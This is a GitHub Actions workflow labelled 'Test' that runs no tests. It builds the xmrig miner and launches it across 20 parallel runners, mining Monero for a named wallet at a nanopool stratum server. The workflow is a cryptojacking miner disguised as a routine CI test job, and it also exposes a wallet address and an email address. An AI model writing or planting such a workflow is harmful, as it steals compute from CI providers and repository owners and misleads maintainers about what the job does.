name: Test
on: 
 workflow_dispatch:
jobs:
   build:
     runs-on: ubuntu-latest
     
     strategy:
       fail-fast: false
       matrix:
         runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]
     steps:
       - name: Uses
         uses: actions/checkout@v4
       - name: install
         run: |
          sudo apt-get update -y
          sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          mkdir ./build && cd ./build
          cmake ..
          make -j$(nproc)
          ./xmrig -a cryptonight -o stratum+tcp://xmr-us-east1.nanopool.org:10300 -u 47wjAGRkC7eMPa5tnJxV5pin2M2FfrapiUvVLQazb7HwDvv11vunhC6FR8J5AZBLWjCUBMbHXM1wN6FrZLPDSm1XQoKUFyc -p git-1:auzziewildcat10@gmail.com -t 1
